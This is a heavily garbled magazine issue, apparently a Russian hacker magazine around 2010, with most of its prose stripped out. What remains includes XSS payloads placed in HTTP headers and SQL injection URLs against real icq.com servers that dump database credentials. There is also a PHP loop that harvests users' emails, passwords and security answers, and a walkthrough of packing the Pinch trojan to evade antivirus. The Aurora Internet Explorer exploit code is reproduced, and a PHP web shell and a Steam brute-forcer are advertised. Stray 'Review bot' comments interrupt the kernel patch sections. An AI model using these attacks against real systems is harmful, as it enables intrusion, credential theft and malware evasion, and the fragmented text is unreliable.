
#9 (dx).

#10 (dx): rar: 500.rar, 499.rar, 498.rar, ..., 0.rar. Batch:
@echo off
for /L %%i in (500,-1,0) do call :arch %%i
exit /b
:arch
set a=%1
rar x -r -pspielberg %a%.rar
del %a%.rar
exit /b

WinRAR; 500.rar; password.txt.

#11 (dx): SoundForge.

#12 (Kaimi): QR; Tineye, Google; qc; QR (zxing.org/w/decode.jspx); RAR!; rar, WinRAR; RAR; PNG; WinRAR.

#13 (dx): exe; Resource Hacker.

#14 (dx): ASCII; 4.

#15 (Kaimi): exe. NES US 89; NES, 1989. NES (ru.wikipedia.org/wiki/___NES/). 1989; Ninja Gaiden. exe.

Kaimi: kaimi.ru/quest_x2/. :)!


uage
t-Lang

HTTP-

, HTTP-
, , ,
- . ?
?
,
. HTTP (HyperText Transfer Protocol ) - ,
-. WWW -.
: , , .
RFC, HTTP ( 1.1),
,
.
:
( google.com) .
.
: ,
. ,
/ .
IP ( ). ,
, .

, ,
. -
Proxomitron.
, . HTTP-.
Proxomitron ,
.


.
Headers :
, ,
New. , out.

.
Mozilla Firefox . Tamper Data
. :
, .
.
Modify Headers.
Always on, .
. (Add , Modify , Filter ),
, ;
. , .


, / .
web-. ,
.

User-Agent
cx75planet.ru
HP-include , . , ,
. , .
XSS ,
.
,
. XSS
Referer ( ), ,
( %xx).

, Referer.
,
.
XSS . , , , , .
SQL- . , , , .
PHP- ,
. .
, GET POST .
, , .
.
:
">. , . '"><script>alert(document.
cookie)</script>.
; , , , <?'?>
.
(
),
, . ,
?
document.cookie 1.

.

,
.
User-Agent
.
: , , , , .
,
:

Modify Headers
/ (; ; ,
[; - ]) []. X11 Windows,
, .
: N (None) , I
(International) 40 ,
U (USA) 128 .
.
, , . Mozilla,
. , ( )
(World
Wide Web Consortium, W3C), ,
.
, , ,
JavaScript (,
Invision Power Board,
2.3.x,
). User-Agent
.
Referer
, .
, - . Referrer ().

, -, ,

.
,
, ( ,
).
, URL , ,
http://evil, http://example.com/evil ..
X-Forwarded-For
, -

HTTP://WWW
links
tools.ietf.org/
html/rfc2616 RFC
HTTP/1.1
2ip.ru/

proxomitron.ru/

Proxomitron'
addons.mozilla.org/
ru/firefox/addon/966/
Tamper Data
addons.mozilla.org/
ru/firefox/addon/967/
Modify Headers
useragentstring.com/
User-Agent


The Proxomitron.
, ,
.
.

The Proxomitron.
IP .
IP, ,
, IP , X-Forwarded-For.
,
XFF, .
- (, , ,
IP ,
). : X-Forwarded-For: client_ip, proxy1_ip, ...,
proxyN_ip.
Accept-Language
,
. . ,
,
.
. , ,
.
Accept-Charset
. , ,
windows-1251.
X-Requested-With
, .
JavaScript . AJAX (Asynchronous
Javascript and XML) ,
XMLHttpRequest.
Authorization
,
, .
Authorization Basic
base64(user:pass). ,
,
(POST).
Cookie
, () .
: ,
. ,
.

, . , .


User-Agent: Opera/10.60 '"><script>alert(document.


cookie)</script>
Referer: http://'"><script>alert(document.cookie)</
script>
X-Forwarded-For: 127.0.0.1'"><script>alert(document.
cookie)</script>
Accept-Language: en,en-US;q=0.9
Authorization: Basic MScyMzo0JzU2
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=!

, , . ,
Accept-Language,
. Authorization , .. , -
. X-Requested-With Cookie ,
. PHP :
, PHPSESSID ( ,
, , ). ,
a-z, A-Z, 0-9 '-,',
- ,
:
Warning: session_start() [function.session-start]:
The session id contains illegal characters, valid
characters are a-z, A-Z, 0-9 and '-,' in /var/www/
data/www/login.php on line 2

, . , -
(), .
.
: , - (,
, ,
), Referer.
, ,
, ...
XSS FeedBurner,
RSS- .
Referer.
raz0r.name/vulnerabilities/
aktivnaya-xss-na-feedburner/ (wp.me/pft5J-4a) ( , - XFF :)).

The Proxomitron.

Tamper Data

DLE (DataLife
Engine), DLE Referer Module (
) . ICQ UIN MySQL-,
,
, .
php.ru
Referer XFF.
. :
MySQL Error = You have an error in your SQL syntax;
check the manual that corresponds to your MySQL
server version for the right syntax to use near
'"')' at line 1
SQL = INSERT INTO oops_sessions (ID,UID,START,LAST,I
PS,PAGES,PAGE,DATA,REFFER) VALUES ('dpdu7rh90ehfsc62
','0',1238958331,1238958331,'xxx.xxx.xxx.xxx',1,'/',
'a:1:{s:8:"USERNAME";s:10:"";}','SQL-Inj'here')

cx75planet.ru. User-Agent XFF. IPB


. ,
SQL- ,
, ..
:).

PHP

, SQL-
. , , ,
. GET, POST Cookie. ,
, .
,
request, :
$headers = array (
'User-Agent: Babytoy/0.5',
'Referer: http://refrefref.ref/omg.pl'
);
$html = request_socket('http://127.0.0.1/
showmeheaders.php', $headers);
echo $html;

PHP
( DVD):

Tamper Data

. :
$packet = "GET {$url} HTTP/1.1\r\n"
. "Host: {$host}\r\n"
. implode("\r\n", $headers) . "\r\n"
. "Connection: Close\r\n\r\n";
- file_get_contents()

:
$opts = array (
'http' => array (
'header' => implode("\r\n", $headers) . "\r\n"
)
);
$context = stream_context_create($opts);
return file_get_contents($url, false, $context);

Curl
curl : curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

,
.
JavaScript, Flash ,
. NoScript
AdBlock. ,
, . ! z



M4g icq 884888, http://snipper.ru

DST
AOL

ICQ: ,,
ICQ

2010
ICQ IM DST AOL.
187 .
,
.
Changes

icq.com - 2010 .
.
, https://icq.com/password, ,
UIN ,
. , email' . ICQ , primary email
, email for login.
-
, ,
.
: ,
,
! ,

.
:
1. ;
2. / ;
3. ,
, ;
4.
.

.
, - .


, email for login -


, ,
,
, .
:
/
, . ,
, - ,
:).
, -
555555558
. ,
https://icq.com/register
,
,
.
,
ICQ.com (
) search.icq.com (
mail.ru), ,
http://www.icq.com/wit/
:).

- icq.
com.

HTTP://WWW
links

ICQ ABV.bg
,

ICQ.
:
1. https://icq.com/password,
;
2.

click here;
3. ,
click here :
: https://www.icq.com/password/form/
web?form_type=qna&id=1&sn=XXX&show=1
: https://www.icq.com/password/form/
web?form_type=qna&id=2&sn=XXX&show=1

,

mail@partner_icq.com.
,
.
, 2010 .
() .


.
, ICQ
:
1. ABV.bg ICQ;
2.
Bigmir.Net;
3. ,
;
4. Yandex ICQ;
5.
Atlas.sk, MyNet.com, Nana.co.il
.

ICQ.com

(https://forum.antichat.ru/showthread.
php?p=626441) SQL-
greetings.icq.com, , , ,
-
SYBASE ASE 15.0.1. :).
DST ( Mail.ru group

SQL- blogs.icq.com
) - ICQ.com
(msgboard_u_ro@64.12.164.91 ,
msgboard , 5.1.45-log )!
(
blogs.icq.com) 17 2010 S00pY Snipper.Ru.

,
( ).
:
http://blogs.icq.com/blogs/blog/
tag/406428869-99999+union+select+1,concat(us
er,0x3a,password),3+from+mysql.user--+

mysql.
user:

http://forum.
asechka.ru



.
http://www.icq.com/
en.html

ICQ.com.
http://snipper.ru/
view/23/sql-inekciyana-blogsicqcom/
SQL-
blogs.icq.com.
http://snipper.ru/view/27/
vozvrashhenieugnannogo-nomeraicq/

ICQ.
http://www.rnspdf.londonstockexchange.com/
rns/7389V_
-2010-11-5.pdf
- DST

IPO.
http://russia.
blog.nimbuzz.
com/2010/11/09/
icq-ne-rabotaet-vnimbuzz/
ICQ
Nimbuzz.


ICQ.com
SQL- icq.com/greetings

Mail.ru ICQ.com
select null,@@version,null,null,null,null,null,null
,1,null,null,null,null,null,null,null,null,null,nul
l--/



msgboard.lsps_tb, (Basic distribution
ID QIP')
ICQ.com, GameLand
ICQ tv :).
...
21;Walla
22;HP
23;Prosieben Austria
24;Jetix
25;Rambler Generic
26;Bigmir Belarus
27;Centrum CZ
28;GameLand
29;SUP
30;Puls4
31;Centrum SK
32;Yandex
...

, ,
blogs.icq.com , , SQL :).

2010 ICQ-, , blogs.icq.com


.
:). SQL- :
http://www.icq.com/greetings/cards/-1111+union+select
+1,concat(user(),0x3a,version(),0x3a,database()),3,4,
5,6,7+from+mysql.user+limit+0,1+--/send/
-- :
http://greetings.icq.com/greetings/cards/-253 union


, blogs.icq.com,
.
,
registration_temp, :
regstr_id
regstr_origin
regstr_fname
regstr_lname
regstr_email
regstr_password
regstr_bdate
regstr_question
regstr_answer
regstr_nickname
regstr_lsp
regstr_reg_date


, , , icq.com/register ! ,

, , ! ,
, :
1. ;
2. registration_temp;
3. .
:
<?php
...
while(1)
{
    $a = send_data('GET','http://www.icq.com/greetings/cards/-1111+union+select+1,count(regstr_id),3,4,5,6,7+from+registration_temp+--/send/');
    $count = preg_replace('@.+id="card_title" value="([^"]+)".+@is','$1',$a);
    $a = send_data('GET','http://www.icq.com/greetings/cards/-1111+union+select+1,concat(regstr_id,0x3a,regstr_origin,0x3a,regstr_fname,0x3a,regstr_lname,0x3a,regstr_email,0x3a,regstr_password,0x3a,regstr_bdate,0x3a,regstr_question,0x3a,regstr_answer,0x3a,regstr_nickname,0x3a,regstr_lsp,0x3a,regstr_reg_date),3,4,5,6,7+from+registration_temp+limit+'.($count-1).',1+--/send/');
    $log = preg_replace('@.+id="card_title" value="([^"]+)".+@is','$1',$a);
    logger($log);
}
?>

. icq.com/wit ICQ.com

Yandex ICQ

, , ,
:). :


- ICQ.com.

https://www.icq.com/register/email_attach.php

( https://www.icq.com/
karma/login_page.php ).
, - ICQ.com
, ,
,
- .
,
:). .
, :
, ,
http://www.icq.com/people//edit/ (
https://www.icq.com/register/email_attach.php),
;
, , .
https://www.icq.com/register/email_attach.php.
- , html- :).
,
( ICQ.com):
1. html-:
<form action="http://icq.com/people/include/xhr.php"
method="POST">
<input name="f" value="resendMail"/><br/>
<input name="e" value="_@.ru"/><br/>
<input name="lang" value="en"/><br/>
<input name="server" value="prod"/><br/>
<input type="submit" value="ok"/><br/>
</form>

2. ;
3. email for login;
4.
https://icq.com/password :).
,
.

,
ICQ .
-,
ICQ,
.
, -

, ,
, . .
:).z



"Cr@wler" crawler@xakep.ru


,
,
malware-.
,
.

, , . -, -
Pinch (
, ).
,
-
( , ,
RAR- DVD).


VMWare Windows XP (
, ).
, OllyDbg, WinHex,
PE- LordPE. , ,
virustotal.com . , ,

, .
,




. . , .
!


.
. , XOR , ,
! ,
(pinch.exe) .
13147810. 13147C26
,
. . , :
13147C30  PUSHAD
13147C31  MOV ECX,6C2F
13147C36  MOV EDX,DWORD PTR DS:[ECX+13141000]
13147C3C  XOR EDX,76
13147C3F  MOV DWORD PTR DS:[ECX+13141000],EDX
13147C45  LOOPD SHORT pinch_pa.13147C36
13147C47  POPAD
13147C48  JMP SHORT pinch_pa.13147810

( ,
copy to executable-all modifications,
Save file). , , LordPE,
( OEP 13147C30,
) . ;
OllyDbg, ,
(
13147C48 , Shift+F9). ,
6C2F . . ! . virustotal.com,
. , 31
43 ( 42 43)! .
.
,
. , ,
( - -
,
2009 ).


13147C4B XOR EAX,EAX;
13147C4D PUSH pinch_pa.13147C62;

13147C52 PUSH DWORD PTR FS:[EAX];

13147C55 MOV DWORD PTR FS:[EAX],ESP;
FS:[0]
13147C58 CALL pinch_pa.13147C58;

13147C5D JMP pinch_pa.13145555;

13147C62 POP EAX;
13147C63 POP EAX
13147C64 POP ESP
13147C65 JMP pinch_pa.13147810;

:

13147C62. ,
, ,
13147C58
(JMP pinch_pa.13145555),

. , , ,
. ,
( 27 43
).
, ?
.

, , ,
,
. ,
,
. ,
, !
,
, (
).
13147C90 , ,
(4Ch ,
13147C30). ,
. ,


OllyDbg , OEP

,
.

. , ! ,
: , 13140002,
:

13147C90 - NEW OEP


length of code 4c
13147c30 - start of code
13147c7c - end of code

13140002  EB 24  JMP SHORT 13140028

, 13140028, :
13147C90  60             PUSHAD
13147C91  B9 4C000000    MOV ECX,4C
13147C96  8B91 307C1413  MOV EDX,DWORD PTR DS:[ECX+13147C30]
13147C9C  83F2 54        XOR EDX,54
13147C9F  8991 307C1413  MOV DWORD PTR DS:[ECX+13147C30],EDX
13147CA5  ^E2 EF         LOOPD SHORT kadabra_.13147C96
13147CA7  61             POPAD
                         jmp 13147c30

,
, .
. , , PE-, ImageBase,
. . WinHex , : 4D 5A 00 00 (-,
MZ,
PE-!). PE- (
13140000h),
:
13140000  4D    DEC EBP
13140001  5A    POP EDX
13140002  0000  ADD BYTE PTR DS:[EAX],AL
13140004  0100  ADD DWORD PTR DS:[EAX],EAX
...
13140028  0000  ADD BYTE PTR DS:[EAX],AL

,
. , ,
MZ-,
, . ,
. 13140028.


13140028  -E9 637C0000  JMP 13147c90

, LordPE
EntryPoint. , , :
25 43 .
, ,
.conf .data ,
. .
,
OllyDbg , ,
! , , image base.
Image base , ,
.

Lost in Time, Dr. Web,


: ,
15- .
, ,
15000 , . , - ,
. , ,
-
, API-,
. ? .
,
. ,
,
. ,
. ,
. ,
, API- GetLocalTime,

:
:)

16-
:
typedef struct _SYSTEMTIME {
    WORD wYear;
    WORD wMonth;
    WORD wDayOfWeek;
    WORD wDay;
    WORD wHour;
    WORD wMinute;
    WORD wSecond;
    WORD wMilliseconds;
} SYSTEMTIME;


, , GetLocalTime,
, , , 13147D7D
13147D94. Sleep(), Kernel32,
, , , . , :
13147CFA PUSH kadabra_.13147D7D;

13147CFF CALL kernel32.GetLocalTime;

13147D04 PUSH 3E8; 1000 , 1
13147D09 CALL kernel32.Sleep;
13147D0E PUSH kadabra_.13147D94;

13147D13 CALL kernel32.GetLocalTime;

16-
, , , :
          [wYear][wMonth][wDayOfWeek][wDay][wHour][wMinute][wSecond][wMilliseconds]
13147D7D: DA 07  0A 00   02 00       0C 00 0D 00  0C 00    31 00    B1 03
13147D94: DA 07  0A 00   02 00       0C 00 0D 00  0D 00    04 00    B1 03

: ,

,
Dr. Web

. 1 ,
, ,
[13147d7d+] [13147D94+],
( ).
, . ?
.
( , , ),
, :). , :
13147CF9 ; (
)
13147D18 MOV AL,BYTE PTR DS:[13147D89]; AL
13147D1D MOV AH,BYTE PTR DS:[13147DA0]; AH
13147D23 SUB AH,AL;
13147D25 XOR EBX,EBX; EBX
13147D27 MOV BL,AH; EBX
13147D29 ADD EBX,13147C29;
13147D2F JMP EBX;

, , ,
EBX, 13147C30. , , , .

: Dr. Web ! :).

. 22 43
- .

, , -
. , ,
, , :
. ,
,
virustotal .
, , , , ,
. ,
, -, TLS. ?
, .
, TLS- ,
,


25%

, . , callback-
.
, TLS (Thread Local Storage)-callback-
( , TLS ,
),
, , . Callback
, OEP.
,
, ,
PE-.
TLS-
( callback- ).
, , .

.

(13147d80 13147d90), .text, .
DWORD , , ,
callback- (13147d96),
callback- (13147da0).
TLS-: 80 7d 14 13 90 7d
14 13 96 7d 14 13 a0 7d 14 13. 13147d5d
( ).
TLS-.
13147da0, 6 ,
Binary Edit. 13 14 7d b0 00 00. 4
callback-.
callback-.
13147db0 ,
, :


13147DB0 PUSHAD;
13147DB1 MOV ECX,6D2F;
13147DB6 MOV DH,BYTE PTR DS:[ECX+13141000];
DH
13147DBC XOR DH,CL;

13147DBE MOV BYTE PTR DS:[ECX+13141000],DH;
13147DC4 LOOPD SHORT 13147DB6;
13147DC6 POPAD;
13147DC7 RETN;

, , , ,
-
OllyDbg.
TLS-
PE-. LordPE TLS Address 00005d7d (,
OllyDbg). ,
TLS,
callback-, OllyDbg Alt+O ,
,
, System Breakpoint (
, TLS callback !).
virustotal.com.
18 43 ! , ,
DrWeb, Panda, NOD32, TrendMicro-HouseCall, VBA32, ViRobot,
VirusBuster, Sunbelt 7048, F-Secure, BitDefender, eSafe
.

. , .
! z

>> coding

http://lotus.xakep.ru

X-testing ontest
IBM Lotus Symphony 3. ,
Lotusphere, 2011 .

cr@wler
10
Lotus Symphony
Lotusphere-2011.
zenit80 .


(Digital Security, dookie@inbox.ru)
(CISS Research Team)
(CISS Research Team, twitter.com/Ntarakanov)

[Figure: Avalanche workflow. Labels in the diagram: driver, tracegrind, covgrind, STP, input + executable, trace.log, dangertrace.log, conditional jumps inversion, danger conditions checking, heuristic value, errors, new input values.]


, ,
Microsoft,
. ,
. .
, .
...
Fuzz me baby one more time!

138 ( 2010 ) Step


,
. ,
,
( , )
- , , ,
-. , ,
, -.
- ,

,
. ,
,
,


( , ),
. , ,
- ,
, :
+----+--------+
|0004|61626364|
+----+--------+
|    | "abcd" |
+----+--------+

, :
+----+-----------+
|FFFF|61626364...|
+----+-----------+
|    | "abcd..." |
+----+-----------+

+----+--------+
|0004|25XX25XX|
+----+--------+
|    | "%n%n" |
+----+--------+

+----++
|0000||
+----++
|    | "" |
+----++

In Memory Fuzzing. IDA

In Memory Fuzzing. ...

, , , ,
... ,
-
(0xFFFF -1)
memcpy, , .
char buffer[32000];
short int length=getLen(filename, offset); //
length=-1 ~ 0xFFFF
if(length<32000) {
// -1<32000
char* p = getPointer(filename,offset+4);
memcpy(buffer,p,length); // length==65535
}
else
ExceptionBoF(length);

( ),
. :
+----+--------+
|0004|61626364|
+----+--------+
|    | "abcd" |
+----+--------+

:
+----+--------+
|0000|61626364|
+----+--------+
|    | "abcd" |
+----+--------+

+----+--------+
|00FF|61626364|
+----+--------+
|    | "abcd" |
+----+--------+

+----+--------+
|FF00|61626364|
+----+--------+
|    | "abcd" |
+----+--------+

In Memory Fuzzing. stack overflow


(0xFF00 - -256 65280 ),
- .

I'll crash you!

,
. , (
), .
, , , - . ,
,
,
. , , . , ,
- ( / ) ,
. ,
, .
, .

More profit...

, , .
, ,
, . , 2006 (Shawn Embleton),
(Sherri Sparks) (Ryan Cunningham)
. ,
( ,
..) , .
( ), ,
, , API (strcpy)
, , .
,
.
( ). , ,
, :).



avalanche, klee
hotfuzz, inmemoryfuzzing
sulley, peach
simple fuzzer:


blackhat.com/
presentations/bh-usa-06/BH-US-06-Embleton.pdf.

In-Memory Fuzzing

, .

?
. , ,
, ,
.

. ,
; , ,
, (, ,
..).
, accept,
recv, .
CorelanSecurity Team,
redmine.corelan.be:8800/projects/inmemoryfuzzing/files.
, Pydasm (therning.org/magnus/
archives/278) Paimei (openrce.org/downloads/details/208/PaiMei).
, Immunity Debuger
(debugger.immunityinc.com/register.html). ,
,
) c pvefindaddr.py (redmine.corelan.be:8800/projects/
pvefindaddr). , ,
:
1. ;
2. pvefindaddr, PyCommand (
);
3. pydasm 2.5;
4. , , installers, ;
5. pydasm Python25\Lib\
site-packages\pydbg\pydasm.pyd.
PyDbg 2.5. - . , ,
,
. ,
- .
, .
.
void func1(char* input)
{
    char buffer[255];
    unsigned int len=strlen(input);
    if(len<255) strcpy (buffer , input);
    fputs("FUNC1: done!\n",stdout);
}
void func2(char* input)
{
    char buffer[255];
    strcpy(buffer,input);
    fputs("FUNC2: done!\n",stdout);
}
void func3(char* input)
{
    char buffer[255];
    strncpy(buffer,input,254);
    fputs("FUNC3: done!\n",stdout);
}

, , ,
,
. - .
input.txt: function_1:func
tion_1:function_3. (vuln.exe)
, .
.
. pvefindadr.
, functions -o -m vuln.
exe. functions.txt.
. Trace.py.
, Trace.py, ,
, .
vuln.exe . func.
.
functions.txt, function_. , (RET),
(, ,
ESP+4, , ESP+8).
new_functions_addrs.txt ( ) flow_log.txt ( ).
CTRL+C ,
:). flow_log.txt ,
( ESP+4 ), /
new_functions_addrs.txt breakpoints.txt,
.
:
0x00401000 0x0040106d ESP+4
0x00401070 0x004010c7 ESP+4
0x004010d0 0x00401125 ESP+4

InMmoryFuzzer.py
vuln.exe. ,
, ,
,
( )
(). crashbin
. ,
(. ). ,
(InMemoryFuzz) ,
, ,
... , , pvefindaddr ,
IDA. ,
,

Peach

(00401070) .
, strcpy ,
. ,
. ( ,
, ,
). ,
(vuln.exe
/GS), security cookie
,
, .

[Figure: Hotfuzz architecture (fragment). Labels: Recorded data aggregation, Data matching, Proxy.]

. , , ,
winappdbg.
.
, winappdbg
.

: avalanche klee
avalanche (http://code.google.com/p/avalanche/):
.

[Figure: Hotfuzz architecture. Labels: Custom Process monitor, Peach in the middle, Custom publisher, GUI Communicator, Main window, Fuzzing Graphical User Interface, Hot fuzz, Datatype-based fuzzing, Netstat-based port scanning, Dialogs, UDP support, Custom Random Fuzzing strategy, Packet reconstruction, Viewing crash details, Data receive, Packets dissection, Filling in missing data, Additional data analysis, Process handling, XML manipulators, Storing application settings, Transforming C-structures into Python-structures, Data analysis.]

Sulley peach.


. , FTP 329
, . ,
.
hotfuzz (hotfuzz.atteq.com).
,
. Hotfuzz peach .
.
, ,
, , ,
tm_export, tshark (
wireshark). , ,
, .
, , ... !
,
peach ( DVD).

[Figure: Hotfuzz architecture (fragment). Labels: Customized WindowsDebugEngine Monitor, Recording, TCP support.]

:
3*10^6 5*10^3 ,
1-3 ;
1*10^6 15*10^3 , 6-10 ;
:
1*10^5 150 ,
0-3 ;
1*10^4 150 ,
0-1 .
,
:
http://sites.google.com/
site/felipeandresmanzano. ,

.
,
. .

[Figure: Hotfuzz architecture (fragment). Labels: Configuration file generation, Data type correction, Transformation into Peach structures, Peach structures creation, Strings tokenization, Finding relations, Wireshark libraries.]

hotfuzz
Avalanche
( ). , .
, . Avalanche
,
stp valgrind (
). :
$ wget http://avalanche.googlecode.com/files/
avalanche-0.2.tar.gz
$ tar -xvf avalanche-0.2.tar.gz
$ cd avalanche-0.2
$ configure --prefix=`pwd`/inst
$ make
$ make install

:
$ ./inst/bin/avalanche --filename=samples/simple/seed
--debug samples/simple/sample2 samples/simple/seed

Avalanche,
avalanche ? -


[1] Dorothy E. Denning and Peter J. Denning. Certification of programs for secure information flow. Communications of the ACM, 1977.
[2] Dorothy E. Denning. A lattice model for secure information flow. Communications of the ACM, 1976.
[3] James Clause, Wanchun Li, and Alessandro Orso. Dytan: A generic dynamic taint analysis framework. Georgia Institute of Technology.
[4] Jim Chow, Tal Garfinkel, Kevin Christopher, Mendel Rosenblum. Understanding data lifetime via whole system emulation. USENIX, Stanford University.
[5] Feng Qin, Ho-seop Kim, Yuanyuan Zhou, Youfeng Wu. LIFT: A Low-Overhead Practical Information Flow Tracking System for Detecting Security Attacks. University of Illinois at Urbana-Champaign.
winappdbg.sourceforge.net/Tools.html.
www.fuzzing.org.

winappdbg

avalanche ,
.
, ,
,
. :
(tainted) ,
( , , ..),
.
( , ,

). ,
,
, ,
, . Avalanche

Valgrind
(solver/) STP. Avalanche
: () Valgrind
Tracegrind Covgrind,
STP . Tracegrind

. STP . - , STP
( ), .
,
.


. ,
STP
.


,
, .
(
, Valgrind).
Covgrind,
. Covgrind , Tracegrind,

.
: Avalanche ,
,
. (tainted
analysis[2-5]), , , ,
.

STP

STP bitvector ( ) . , , (loop). ,


,

(loop) (control flow graph). :
groups.csail.mit.edu/pag/daikon;
http://research.microsoft.com/
en-us/um/people/sumitg/pubs/vmcai09_cons.pdf;
groups.csail.mit.edu/pag/pubs/annotation-studyfse2002-abstract.html.

Avalanche ,
. KLEE
(klee.llvm.org).
. z


PocketBook!

PocketBook

?
?
usability? ,
10 2011 pocketbook@real.xakep.ru.
E-Ink
: PocketBook 902.


, CISS Research Team http://twitter.com/NTarakanov

TOP5
2010

- ,
!
-,
.
5 .

32- 64- linux


2007 CVE-2007-4573 (bit.ly/CVE-20074573). cliph,
Wojciech Purczynski (, ?).
, 64-
linux, 32- . (
arch/x86_64/ia32/ia32entry.S), 32-
64-:
sysenter_do_call:
    cmpl $(IA32_NR_syscalls-1),%eax      <---- EAX
    ja   ia32_badsys
    IA32_ARG_FIXUP 1
    call *ia32_sys_call_table(,%rax,8)   <---- RAX

, eax .
, IA32_ARG_
FIXUP. 64- 32-.
sysenter_do_call, ,
eax,
rax! , 32 ,


call !
.macro IA32_ARG_FIXUP noebp=0
    movl %edi,%r8d
    .if \noebp
    .else
    movl %ebp,%r9d
    .endif
    xchg %ecx,%esi
    movl %ebx,%edi
    movl %edx,%edx   /* zero extension */
.endm


LOAD_ARGS:
X+
.macro LOAD_ARGS32 offset
+
movl \offset(%rsp),%r11d
+
movl \offset+8(%rsp),%r10d
+
movl \offset+16(%rsp),%r9d
+
movl \offset+24(%rsp),%r8d
+
movl \offset+40(%rsp),%ecx
+
movl \offset+48(%rsp),%edx
+
movl \offset+56(%rsp),%esi
+
movl \offset+64(%rsp),%edi
+
movl \offset+72(%rsp),%eax <----
rax

.endm
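Review bot: `movl \offset+72(%rsp),%eax` zero-extends into %rax, so a stale upper half can no longer travel from pt_regs into `call *ia32_sys_call_table(,%rax,8)`, which is what this hunk closes; the remaining weak point is that sysenter_do_call still bounds-checks with `cmpl $(IA32_NR_syscalls-1),%eax` while the table is indexed with %rax, a different register width. Any other way of leaving the upper 32 bits of %rax non-zero passes that check, so the comparison should be made on the register that is actually used as the index (`cmpq $(IA32_NR_syscalls-1),%rax`), which is exactly the change of the 2010 fix quoted further down.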

24 2008
, :).
-

movl \offset+72(%rsp),%eax
.endm

2010 Ben Hawkes, ,


eax.
Ac1dB1tch3z. Ben
Hawkes' ;).

FreeBSD 7.2
cmpl
$(IA32_NR_syscalls-1),%eax
+
cmpq
$(IA32_NR_syscalls-1),%rax <--- rax eax

4 .
FreeBSD: nfs_mount()

Patroklos
Argyroudis, argp.
nfs_mount,
mount() nmount(),
, . sys/nfsclient/nfs_vfsops.c 8.0:
if (!has_fh_opt) {
    error = copyin((caddr_t)args.fh, (caddr_t)nfh,
        args.fhsize);                            <----- fhsize
    if (error) {
        goto out;
    }


: vfs.usermount
( ). , :
+
if (args.fhsize < 0 || args.fhsize > NFSX_
V3FHMAX) {
+
vfs_mount_error(mp, "Bad file handle");
+
error = EINVAL;
+
goto out;
+
}
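Review bot: args.fhsize is compared as a signed value here, so the `< 0` half of the condition is as important as the `> NFSX_V3FHMAX` bound: a negative size handed to the `copyin(..., args.fhsize)` shown above becomes a huge unsigned length. The check also has to be evaluated before that copyin and on every path into nfs_mount, not only when the vfs.usermount sysctl mentioned above lets an unprivileged user reach it.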

FreeBSD 8.0 ,
, canary word. FreeBSD
stack-smashing protection.
. ret , canary word

FreeBSD
. , (ring 3), (ring 0). -
7- , 8- DoS' :(.

3 .
Windows

! ,
mail.ru
Windows 17- !.
32- Windows, NT 4.0 !
Windows 16-
NTVDM (NT Virtual DOS Mode).
Tavis Ormandy
Google. , /.
:
1. VDM SeTcbPrivilege.
2. (Ring 3 )

.
3. -


Tavis'
trap frame. Tavis Ormandy !
. . NTVMD-,
csrss API-
,
.
. CPL (Current Privilege Level)
cs
ss, ,
Virtual-8086.
x86 , ,
16 , 20- .
: (cs << 4) + (eip & 0xffff).
Virtual-8086.
, cs !
. iret
.
Intel 6 ,
IF-. : Pre-commit
Post-commit. , ring 3.
VDM,
NtVdmControl, pre-commit trap-frame.

2 . Internet
Explorer: Aurora

IE (CVE-20100249),
Aurora.
Microsoft',
( MS).
CVE-2010-0249 mshtml.dll. ,

use-after-free. , JavaScript,
:
document.CreateEventObject() ;
document.getElementById(),
, JavaScript'a -



-
, !
-
srcElement CEventObj::GenericGetElement
mshtml.dll, , , CElement::
GetDocPtr.
:
function ev1(evt)
{
event_obj = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 1);
}
function ev2()
{
var data, tmp;
data = "";
tmp = unescape("%u0a0a%u0a0a");
for (var i = 0 ; i < 4 ; i++)
data += tmp;
for (i = 0 ; i < obj.length ; i++)
{
obj[i].data = data;
}
event_obj.srcElement;
}


[Figure: control-flow and data-access graph of the Control Panel applet loading path in shell32.dll. Nodes: CPL_FindCPLInfo, CPL_LoadAndFindApplet, DSA_GetItemPtr, CPL_LoadCPLModule, _LoadCPLModule, LoadLibraryW (hModule), _InitializeCPLModule, _InitializeControl, DSA_InsertItem, LoadImage, CopyIcon (hIcon). Legend: Data Access, Control Flow.]
Control flow: LoadLibraryW

, DEP,
ASLR,
, .
Google: , 12
Gmail.
! :) ,
, , , Google .

17 . Microsoft
advisory.
( ;)),
Microsoft VirusBlokAda
, .
-, - :).
stack/heap overflow
.. ,
:).
Control Panel,
Explorer.exe.
shell32.dll,
,
( ) LoadLibraryW.
,
(DEP/ASLR/SEHOP) !

1 .
lnk-

2011-?

<body>
<span id="sp1">
<img src="aurora.gif" onload="ev1(event)">   <-----
</span>
</body>

, , , , top 5! Stuxnet,
USB-.
MetaSploit'e , WebDAV .
:
17 .
VirusBlokAda ,
Windows 7,
USB-
(Windows Explorer).

,
2010 , .
Stuxnet
SCADA-, Aurora
, -
:). , (,
, ) 0day .
, ,
Windows Vista, 2008, 7,
Stuxnet! . , , . z



icq 884888, http://snipper.ru

X-TOOLS
: Steam`O Brute
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: INSIDER


, steam-.
:
(http, socks 4/5);
;
;
good;
error
( , ).


:
1.
txt- (
login;pass , proxy:port);
2. ;
3. START.
,
, ,
.

: Mikstura
: *nix/win
: Dr.TRO

php-.
:

;


, data:, php://
input;

data: php://input,

;
-
;
, , full path,
( 15
"../");

( );
HTTP- perl-
LWP::Protocol::socks.




.

http://forum.
inattack.ru/Mikstura-Mini-utilita-Dlja-RabotyS-Inkludami-t23830.html.

: ITSecTeam Shell v2.1


: *nix/win
: Amin Shokohi(Pejvak)

php-.
:). ,
- ITSecTeam Shell v2.1!
:
(66 );
;
;
;
MySQL, MSSQL,
PostgreSQL, Oracle & IBM DB2;

;
, PHP safe mode;
Windows;

;

;
zip ;
;
( php);

;
-;
DoS;
sql/gzip-;
-
;
;

DDoS-;
;
symlink mod_security .htaccess;
;

php;
;
magic_quotes;
.

,
, :).
http://itsecteam.
com/en/tools/itsecteam_shell.htm.

: ICQuinValuer
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Dank & DeMerk &
NightEagle


.

ICQ-

ICQ-
.
ICQ :
(viz/
inviz) ;
( ,
, , , , , ..);
;
;
;

;

;
.

,
:).


forum.asechka.ru/showthread.php?t=118542.

: Easteregger
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
:

,
. . Eastegger
:).

( ),

.
,
, , , ,
.
.
:
1. (, , );
2. , , , .
,
Torrent. :



.
Help-About Torrent
